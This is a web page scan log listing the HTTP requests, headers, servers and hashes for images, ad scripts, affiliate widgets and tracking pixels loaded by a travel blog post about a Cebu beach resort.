cdn-requestid: f9b4b1189c1df9bd908de8087f15e17d
cdn-requestcountrycode: DK
cdn-requestpullsuccess: True

GET
H2 200 14475895794_9ef145ce20_z.jpg
farm4.staticflickr.com/3855/ 100 KB
101 KB 291ms
266ms Image
image/jpeg 2600:9000:2127:b000:0:5a51:64c9:c681
AMAZON-02

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://farm4.staticflickr.com/3855/14475895794_9ef145ce20_z.jpg

Requested by

Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2600:9000:2127:b000:0:5a51:64c9:c681 , United States, ASN16509 (AMAZON-02, US),

Reverse DNS

Software

Jubilee /

Resource Hash

6340dab1f3385626989763059662335e4d60a6ffd15df9402b0e400e0b13ede1

Security Headers

Name	Value
X-Frame-Options	DENY

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:07 GMT
via: 1.1 0c8bf5614b4bcc3e76982cb7ff9a7662.cloudfront.net (CloudFront)
mib: 2
x-ttfb: 0.1479
surrogate-control: public, max-age=31536000
ourvalues: Deliver Awesome (#3 of 5)
x-cache: Miss from cloudfront
p3p: CP="This is not a P3P policy. We respect your privacy."
streaming: false
edge-control: public, max-age=31536000
last-modified: Fri, 01 Mar 2019 14:03:19 GMT
imageheight: 424
powered-by: Mutation/1.0
imagewidth: 640
x-ttdb-l: 102230
x-request-id: cf0c4a8f
x-ua-compatible: IE=edge
x-env: a=live, b=jubilee, c=21738c41, e=d7623440658aa0a38a7212a93ee0f09a89784c7e, f=d7623440658aa0a38a7212a93ee0f09a89784c7e
server: Jubilee
etag: "0ae33b0f009005f609387be9064ee562.1"
x-frame-options: DENY
access-control-allow-methods: GET, OPTIONS
content-type: image/jpeg
access-control-allow-origin: *
cache-control: public, max-age=31536000
x-amz-cf-pop: PRG50-C1
hiring: Change the world of photography with us. https://www.flickr.com/jobs/
origintype: X
x-amz-cf-id: WzLZ6jnZbaM11zKZhl1qlpHeS2XErAjG8CMF46E93cYf8m-gmjvJAw==
quote: "I'm not a kid anymore, I'm one of you, one of the X-Men. It means more to me than anything in the world."
expires: Sat, 02 Apr 2022 03:11:07 GMT

GET
H2 200 14497233153_8e7917b14f_z.jpg
farm3.staticflickr.com/2906/ 123 KB
124 KB 296ms
272ms Image
image/jpeg 2600:9000:2127:f200:0:5a51:64c9:c681
AMAZON-02

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://farm3.staticflickr.com/2906/14497233153_8e7917b14f_z.jpg

Requested by

Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2600:9000:2127:f200:0:5a51:64c9:c681 , United States, ASN16509 (AMAZON-02, US),

Reverse DNS

Software

Jubilee /

Resource Hash

72f95fddf73d028d62bcf0c5cba1bd3521262108e4c6beb1f6634201e94ee6a0

Security Headers

Name	Value
X-Frame-Options	DENY

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:07 GMT
via: 1.1 6fc3cae9692b6db972e4990be9921fae.cloudfront.net (CloudFront)
mib: 4
x-ttfb: 0.1528
surrogate-control: public, max-age=31536000
ourvalues: Dare (#4 of 5)
x-cache: Miss from cloudfront
p3p: CP="This is not a P3P policy. We respect your privacy."
streaming: false
edge-control: public, max-age=31536000
last-modified: Fri, 01 Mar 2019 00:54:25 GMT
imageheight: 424
powered-by: Mutation/1.0
imagewidth: 640
x-ttdb-l: 125956
x-request-id: 01aa72ab
x-ua-compatible: IE=edge
x-env: a=live, b=jubilee, c=4cf206a9, e=d7623440658aa0a38a7212a93ee0f09a89784c7e, f=d7623440658aa0a38a7212a93ee0f09a89784c7e
server: Jubilee
etag: "8eec9dddb060359c9cdff697d2dec592.1"
x-frame-options: DENY
access-control-allow-methods: GET, OPTIONS
content-type: image/jpeg
access-control-allow-origin: *
cache-control: public, max-age=31536000
x-amz-cf-pop: PRG50-C1
hiring: Change the world of photography with us. https://www.flickr.com/jobs/
origintype: X
x-amz-cf-id: 8oepFnddt0RrhkZCC28n0E-xMTfYPDw7R-i6gBgB-D5m-9Axl4nWgA==
quote: "I'm not a kid anymore, I'm one of you, one of the X-Men. It means more to me than anything in the world."
expires: Sat, 02 Apr 2022 03:11:07 GMT

GET
H3-Q050 200 71hr94SUjmI4WsmVKl_xSF-LeUxrKTKLcbZwOLomvE8.js Show response
pagead2.googlesyndication.com/bg/ Frame C3F0 14 KB
6 KB 6ms
6ms Script
text/javascript 2a00:1450:4001:812::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://pagead2.googlesyndication.com/bg/71hr94SUjmI4WsmVKl_xSF-LeUxrKTKLcbZwOLomvE8.js

Requested by

Host: googleads.g.doubleclick.net
URL: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=280&slotname=2262990825&adk=3733099233&adf=2452791592&pi=t.ma~as.2262990825&w=825&fwrn=4&fwrnh=100&lmt=1617333066&rafmt=1&psa=0&format=825x280&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=3&wgl=1&dt=1617333065805&bpp=1&bdt=305&idt=219&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=245&ady=3468&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7ClEbr%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=5&uci=a!5&btvi=3&fsb=1&xpc=LK9BJI43vo&p=https%3A//www.itravelrox.com&dtd=224

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:812::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

ef586bf784948e62385ac9952a5ff1485f8b794c6b29328b71b67038ba26bc4f

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Thu, 01 Apr 2021 09:59:54 GMT
content-encoding: br
x-content-type-options: nosniff
last-modified: Wed, 24 Mar 2021 17:18:00 GMT
server: sffe
age: 61873
vary: Accept-Encoding
content-type: text/javascript
cache-control: public, max-age=31536000
cross-origin-resource-policy: cross-origin
accept-ranges: bytes
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 5693
x-xss-protection: 0
expires: Fri, 01 Apr 2022 09:59:54 GMT

GET
H2 200 sdk.js Show response
connect.facebook.net/en_US/ 199 KB
60 KB 7ms
6ms Script
application/x-javascript 2a03:2880:f01c:8012:face:b00c:0:3
FACEBOOK

General

Check archive.org

Show headers Download Go to

Full URL

https://connect.facebook.net/en_US/sdk.js?hash=58bc4d77d2b3852eb13ee4d4f51c8253&ua=modern_es6

Requested by

Host: connect.facebook.net
URL: https://connect.facebook.net/en_US/sdk.js

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2a03:2880:f01c:8012:face:b00c:0:3 , United States, ASN32934 (FACEBOOK, US),

Reverse DNS

Software

Resource Hash

a7e6bcf2d723ad29de8d84f47b2e115eaf2b51d8d0e6c8dbee5634cdfd6ae27d

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; preload; includeSubDomains
X-Content-Type-Options	nosniff
X-Frame-Options	DENY

Request headers

Origin: https://www.itravelrox.com
Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

strict-transport-security: max-age=31536000; preload; includeSubDomains
content-encoding: gzip
x-content-type-options: nosniff
content-md5: 5l8I8VT9nr+1GFP3lyhd6g==
cross-origin-resource-policy: cross-origin
expires: Sat, 02 Apr 2022 02:15:44 GMT
alt-svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
content-length: 61293
x-fb-rlafr: 0
x-fb-debug: Rgx+FVzunMcUgqMnpEpcYOxjWwO9aFYMsdYvEhn9t0DY/Kvolh46GPh1LpF7lQNYoUMHYTf1oY8/0MHnGfb44g==
x-fb-trip-id: 2050670934
x-fb-content-md5: a1ab037fe3e29dd3a63df5636f1f9e73
cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
date: Fri, 02 Apr 2021 03:11:07 GMT
x-frame-options: DENY
report-to: {"group":"coop_report","max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/"}],"include_subdomains":true}, {"group":"coep_report","max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/"}]}
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
vary: Accept-Encoding
cache-control: public,max-age=31536000,stale-while-revalidate=3600,immutable
etag: "ee938c9a7cf6bff973de1c5864f8ae23"
timing-allow-origin: *
priority: u=3,i
cross-origin-opener-policy-report-only: same-origin-allow-popups;report-to="coop_report"
access-control-expose-headers: X-FB-Content-MD5

GET
H/1.1 200
OK flexiproduct.html Show response
www.booking.com/ Frame 886F 3 KB
2 KB 290ms
175ms Document
text/html 5.57.17.220
BOOKING-BV Bookin...

General

Check archive.org

Show headers Download Go to

Full URL

https://www.booking.com/flexiproduct.html?product=banner&w=250&h=250&lang=en-US&aid=1544504&target_aid=1544504&tmpl=affiliate_banner&fid=1617333067153&

Requested by

Host: aff.bstatic.com
URL: https://aff.bstatic.com/static/affiliate_base/js/flexiproduct.js?v=1617333066960

Protocol

HTTP/1.1

Security

TLS 1.3, , AES_128_GCM

Server

5.57.17.220 , Netherlands, ASN43996 (BOOKING-BV Booking.com, NL),

Reverse DNS

www.booking.com

Software

nginx /

Resource Hash

eefbca4bcce99d4a461338beacaefcf046ebe6b83667b0772a2757abfcdc4474

Security Headers

Name	Value
Strict-Transport-Security	max-age=604800
X-Content-Type-Options	nosniff
X-Xss-Protection	1; mode=block

Request headers

Host: www.booking.com
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: iframe
Referer: https://www.itravelrox.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
Referer: https://www.itravelrox.com/

Response headers

server: nginx
date: Fri, 02 Apr 2021 03:11:07 GMT
content-type: text/html; charset=UTF-8
content-length: 1109
cache-control: private
vary: User-Agent, Accept-Encoding
content-encoding: br
nel: {"report_to":"default","max_age":604800}
report-to: {"endpoints":[{"url":"https://nellie.booking.com/report"}],"max_age":604800,"group":"default"}
set-cookie: _pxhd=b5a643a3dbe790b8e801e3b27b68080492abc91c3268fd4d693da9af24e49ca4%3A111a2911-9361-11eb-869d-c3c9186221f0; path=/; expires=Sat, 02-Apr-2022 03:11:07 GMT bkng=11UmFuZG9tSVYkc2RlIyh9Yaa29%2F3xUOLbnmKTRaewPBtA5lmOn2%2FpApQKOFxhFXXdT8KeyxtbtGLCXiQv5pT%2B6B6xnmLIa9QeogfdKyILuC2DnpSC7XDkegsiIZDyW%2FcNzoBHfF9vlARxxwCUr5k5Ha%2BukfkScx5JeqbvU3KZbGq%2Ft7QP93hWLguefQPCAZ7n; domain=.booking.com; path=/; expires=Wed, 01-Apr-2026 03:11:07 GMT; Secure; HTTPOnly; SameSite=None
strict-transport-security: max-age=604800
x-content-type-options: nosniff
x-xss-protection: 1; mode=block

GET
H3-Q050 200 js Show response
www.googletagmanager.com/gtag/ Frame C273 97 KB
38 KB 19ms
18ms Script
application/javascript 2a00:1450:4001:813::2008
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://www.googletagmanager.com/gtag/js?id=UA-6446424-36

Requested by

Host: sherpa.agoda.com
URL: https://sherpa.agoda.com/Static/Index?ReferenceKey=obYl0BHxMMiU7D8PQ33upA%3D%3D&Language=en-us&Hg=300px&Wd=300px&OverideConf=false&Layout=SquareStatic&MobOptimized=true&Ver=1.03&Crt=7219864560299

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:813::2008 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

Google Tag Manager /

Resource Hash

d908d5e07a76e0c221189c1a8faf5e9c8b0f3f8c9724c6298f734eb17af3d1ce

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains
X-Xss-Protection	0

Request headers

Referer: https://sherpa.agoda.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:07 GMT
content-encoding: br
server: Google Tag Manager
access-control-allow-headers: Cache-Control
vary: Accept-Encoding
content-type: application/javascript; charset=UTF-8
access-control-allow-origin: *
cache-control: private, max-age=900
access-control-allow-credentials: true
cross-origin-resource-policy: cross-origin
strict-transport-security: max-age=31536000; includeSubDomains
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 39091
x-xss-protection: 0
expires: Fri, 02 Apr 2021 03:11:07 GMT

GET
H/1.1 200
OK squarestatic_simple.min.css
sherpa.agoda.com/css/production/ Frame C273 71 KB
12 KB 35ms
35ms Stylesheet
text/css 203.160.137.61
AGODA-TH-AS-AP Th...

General

Check archive.org

Show headers Download Go to

Full URL: https://sherpa.agoda.com/css/production/squarestatic_simple.min.css?v=CxuaZYXU2uNJGvRpBalRB5GniCEWkBrsCLdCOsJqwCs
Requested by: Host: sherpa.agoda.com
URL: https://sherpa.agoda.com/Static/Index?ReferenceKey=obYl0BHxMMiU7D8PQ33upA%3D%3D&Language=en-us&Hg=300px&Wd=300px&OverideConf=false&Layout=SquareStatic&MobOptimized=true&Ver=1.03&Crt=7219864560299
Protocol: HTTP/1.1
Security: TLS 1.2, ECDHE_RSA, AES_256_GCM
Server: 203.160.137.61 , Netherlands, ASN45530 (AGODA-TH-AS-AP The Offices at Central World, 27th floor, TH),
Reverse DNS
Software: Kestrel / ASP.NET
Resource Hash: 0b1b9a6585d4dae3491af46905a9510791a7882116901aec08b7423ac26ac02b

Request headers

Referer: https://sherpa.agoda.com/Static/Index?ReferenceKey=obYl0BHxMMiU7D8PQ33upA%3D%3D&Language=en-us&Hg=300px&Wd=300px&OverideConf=false&Layout=SquareStatic&MobOptimized=true&Ver=1.03&Crt=7219864560299
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

Date: Fri, 02 Apr 2021 03:11:07 GMT
Content-Encoding: gzip
ETag: "1d6a762154dc7e6"
Last-Modified: Wed, 21 Oct 2020 04:24:36 GMT
Server: Kestrel
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Type: text/css
Transfer-Encoding: chunked
Accept-Ranges: bytes

GET
H2 200 logo-color.png
cdn0.agoda.net/images/sherpa/logo/v1/ Frame C273 6 KB
7 KB 32ms
31ms Image
image/png 104.111.235.205
AKAMAI-AS

General

Check archive.org

Show headers Download Go to Show image

Full URL: https://cdn0.agoda.net/images/sherpa/logo/v1/logo-color.png
Requested by: Host: sherpa.agoda.com
URL: https://sherpa.agoda.com/Static/Index?ReferenceKey=obYl0BHxMMiU7D8PQ33upA%3D%3D&Language=en-us&Hg=300px&Wd=300px&OverideConf=false&Layout=SquareStatic&MobOptimized=true&Ver=1.03&Crt=7219864560299
Protocol: H2
Security: TLS 1.2, ECDHE_RSA, AES_256_GCM
Server: 104.111.235.205 Frankfurt am Main, Germany, ASN16625 (AKAMAI-AS, US),
Reverse DNS: a104-111-235-205.deploy.static.akamaitechnologies.com
Software: nginx /
Resource Hash: c1c1a6dc0077c6c25cdc9ccc26e81c72030b342e2fe388914f38d84571c0b24f

Request headers

Referer: https://sherpa.agoda.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:07 GMT
last-modified: Mon, 15 May 2017 06:50:45 GMT
server: nginx
x-dc: ASH
etag: "6825e9447cdd21:0"
x-cache-status: HIT
content-type: image/png
access-control-allow-origin: *
cache-control: max-age=1413617
accept-ranges: bytes
timing-allow-origin: *
content-length: 6487
expires: Sun, 18 Apr 2021 11:51:24 GMT

GET
H/1.1 200
OK common-scripts.min.js Show response
sherpa.agoda.com/js/production/ Frame C273 131 KB
56 KB 72ms
34ms Script
application/javascript 203.160.137.61
AGODA-TH-AS-AP Th...

General

Check archive.org

Show headers Download Go to

Full URL: https://sherpa.agoda.com/js/production/common-scripts.min.js
Requested by: Host: sherpa.agoda.com
URL: https://sherpa.agoda.com/Static/Index?ReferenceKey=obYl0BHxMMiU7D8PQ33upA%3D%3D&Language=en-us&Hg=300px&Wd=300px&OverideConf=false&Layout=SquareStatic&MobOptimized=true&Ver=1.03&Crt=7219864560299
Protocol: HTTP/1.1
Security: TLS 1.2, ECDHE_RSA, AES_256_GCM
Server: 203.160.137.61 , Netherlands, ASN45530 (AGODA-TH-AS-AP The Offices at Central World, 27th floor, TH),
Reverse DNS
Software: Kestrel / ASP.NET
Resource Hash: 601a7644b2a2838ad9404c7b57d79151d9610c3f2d43c07f609300f7f930794f

Request headers

Referer: https://sherpa.agoda.com/Static/Index?ReferenceKey=obYl0BHxMMiU7D8PQ33upA%3D%3D&Language=en-us&Hg=300px&Wd=300px&OverideConf=false&Layout=SquareStatic&MobOptimized=true&Ver=1.03&Crt=7219864560299
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

Date: Fri, 02 Apr 2021 03:11:07 GMT
Content-Encoding: gzip
ETag: "1d6a762167c0b98"
Last-Modified: Wed, 21 Oct 2020 04:24:38 GMT
Server: Kestrel
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Type: application/javascript
Transfer-Encoding: chunked
Accept-Ranges: bytes

GET
H/1.1 200
OK simplesearchbox.min.js Show response
sherpa.agoda.com/js/production/ Frame C273 14 KB
6 KB 104ms
40ms Script
application/javascript 203.160.137.61
AGODA-TH-AS-AP Th...

General

Check archive.org

Show headers Download Go to

Full URL: https://sherpa.agoda.com/js/production/simplesearchbox.min.js?v=qXO6hVAqSYFgfrYjOylLRUXFtv84udWEYPHipVeZKGM
Requested by: Host: sherpa.agoda.com
URL: https://sherpa.agoda.com/Static/Index?ReferenceKey=obYl0BHxMMiU7D8PQ33upA%3D%3D&Language=en-us&Hg=300px&Wd=300px&OverideConf=false&Layout=SquareStatic&MobOptimized=true&Ver=1.03&Crt=7219864560299
Protocol: HTTP/1.1
Security: TLS 1.2, ECDHE_RSA, AES_256_GCM
Server: 203.160.137.61 , Netherlands, ASN45530 (AGODA-TH-AS-AP The Offices at Central World, 27th floor, TH),
Reverse DNS
Software: Kestrel / ASP.NET
Resource Hash: a973ba85502a4981607eb6233b294b4545c5b6ff38b9d58460f1e2a557992863

Request headers

Referer: https://sherpa.agoda.com/Static/Index?ReferenceKey=obYl0BHxMMiU7D8PQ33upA%3D%3D&Language=en-us&Hg=300px&Wd=300px&OverideConf=false&Layout=SquareStatic&MobOptimized=true&Ver=1.03&Crt=7219864560299
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

Date: Fri, 02 Apr 2021 03:11:07 GMT
Content-Encoding: gzip
ETag: "1d6a762141b9bf8"
Last-Modified: Wed, 21 Oct 2020 04:24:34 GMT
Server: Kestrel
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Type: application/javascript
Transfer-Encoding: chunked
Accept-Ranges: bytes

GET
H3-Q050

200

pixel
cm.g.doubleclick.net/ Frame 814D
Redirect Chain

https://cms.quantserve.com/dpixel?a=p-n5vvLvRdjg0ek&eid=0&qc_google_push=&google_gid=CAESEOU5FYel-10cqE3MmdyD29w&google_cver=1&google_push=AQvitUIROOGkcUqdW9Ws5Qf_WyOf-S5npvPSwGX44y-Mfrv0euRpgOdXeY...
https://cm.g.doubleclick.net/pixel?gdpr=1&google_nid=B765081F39B1F7&google_push=AQvitUIROOGkcUqdW9Ws5Qf_WyOf-S5npvPSwGX44y-Mfrv0euRpgOdXeYF6J3-Nc-MeQT0eZQCl5tJC-bfbCmaRmlbyipPbo_ST&google_hm=V_Swkq...

170 B
484 B

97ms
56ms

Image
image/png

142.250.186.162
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://cm.g.doubleclick.net/pixel?gdpr=1&google_nid=B765081F39B1F7&google_push=AQvitUIROOGkcUqdW9Ws5Qf_WyOf-S5npvPSwGX44y-Mfrv0euRpgOdXeYF6J3-Nc-MeQT0eZQCl5tJC-bfbCmaRmlbyipPbo_ST&google_hm=V_SwkqAXFGInUP2C4ypjoA

Requested by

Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

142.250.186.162 , United States, ASN15169 (GOOGLE, US),

Reverse DNS

fra24s08-in-f2.1e100.net

Software

HTTP server (unknown) /

Resource Hash

0b8a20373c6dd04e091902226d922b3688143a8938afb9d283d889de7b55ceb5

Security Headers

Name	Value
X-Xss-Protection	0

Request headers

Referer: https://pagead2.googlesyndication.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

pragma: no-cache
date: Fri, 02 Apr 2021 03:11:07 GMT
server: HTTP server (unknown)
content-type: image/png
cache-control: no-cache, must-revalidate
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 170
x-xss-protection: 0
expires: Fri, 01 Jan 1990 00:00:00 GMT

Redirect headers

location: https://cm.g.doubleclick.net/pixel?gdpr=1&google_nid=B765081F39B1F7&google_push=AQvitUIROOGkcUqdW9Ws5Qf_WyOf-S5npvPSwGX44y-Mfrv0euRpgOdXeYF6J3-Nc-MeQT0eZQCl5tJC-bfbCmaRmlbyipPbo_ST&google_hm=V_SwkqAXFGInUP2C4ypjoA
pragma: no-cache
date: Fri, 02 Apr 2021 03:11:07 GMT
cache-control: private, no-cache, no-store, proxy-revalidate
content-length: 0
strict-transport-security: max-age=86400
expires: Fri, 04 Aug 1978 12:00:00 GMT

GET
H3-Q050

200

pixel
cm.g.doubleclick.net/ Frame 814D
Redirect Chain

https://pixel.everesttech.net/1/m?url=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Deverest%26google_hm%3D__EFGSURFER_USB64__%26google_push%3DAQvitUI6ipmgot2OM0lbk5NxwxtpGzr6S84W1W_glFd...
https://cm.g.doubleclick.net/pixel?google_nid=everest&google_hm=WUdhTFN3QUFBY1AwM2poaw&google_push=AQvitUI6ipmgot2OM0lbk5NxwxtpGzr6S84W1W_glFdT0iJqwn8Y-WbZ3WvX8eQJ0FrUOlglLHKbptxQJlyjC30ywufQjmISF7z_

170 B
190 B

43ms
43ms

Image
image/png

142.250.186.162
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://cm.g.doubleclick.net/pixel?google_nid=everest&google_hm=WUdhTFN3QUFBY1AwM2poaw&google_push=AQvitUI6ipmgot2OM0lbk5NxwxtpGzr6S84W1W_glFdT0iJqwn8Y-WbZ3WvX8eQJ0FrUOlglLHKbptxQJlyjC30ywufQjmISF7z_

Requested by

Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

142.250.186.162 , United States, ASN15169 (GOOGLE, US),

Reverse DNS

fra24s08-in-f2.1e100.net

Software

HTTP server (unknown) /

Resource Hash

0b8a20373c6dd04e091902226d922b3688143a8938afb9d283d889de7b55ceb5

Security Headers

Name	Value
X-Xss-Protection	0

Request headers

Referer: https://pagead2.googlesyndication.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

pragma: no-cache
date: Fri, 02 Apr 2021 03:11:07 GMT
server: HTTP server (unknown)
content-type: image/png
cache-control: no-cache, must-revalidate
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 170
x-xss-protection: 0
expires: Fri, 01 Jan 1990 00:00:00 GMT

Redirect headers

Location: https://cm.g.doubleclick.net/pixel?google_nid=everest&google_hm=WUdhTFN3QUFBY1AwM2poaw&google_push=AQvitUI6ipmgot2OM0lbk5NxwxtpGzr6S84W1W_glFdT0iJqwn8Y-WbZ3WvX8eQJ0FrUOlglLHKbptxQJlyjC30ywufQjmISF7z_
Date: Fri, 02 Apr 2021 03:11:07 GMT
Server: Apache
Connection: keep-alive
Content-Length: 391
Content-Type: text/html; charset=iso-8859-1

GET
H2 200 sync
odr.mookie1.com/t/v2/ Frame 814D 43 B
324 B 109ms
52ms Image
image/gif 34.98.67.61
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL: https://odr.mookie1.com/t/v2/sync?tagid=V2_4531&src.visitorid=CAESEJzR1G3tU9bC5rGG84a6aik&google_push=AQvitUI6c8XIsOBZovPLXGiquWpkptkyA9CLM0UZ7ck2yuAimFrhmog3eSyF_a9ouMXxujnmRmpxgja-pUW9fHy4j4U-1k8phTg&google_cver=1
Requested by: Host: googleads.g.doubleclick.net
URL: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=1313&slotname=1929479831&adk=1389158022&adf=3725392101&pi=t.ma~as.1929479831&w=254&cr_col=1&cr_row=6&lmt=1617333066&rafmt=9&psa=0&format=254x1313&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&crui=pub_control_image_card_stacked&wgl=1&dt=1617333065842&bpp=2&bdt=341&idt=233&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280%2C825x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=1101&ady=578&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1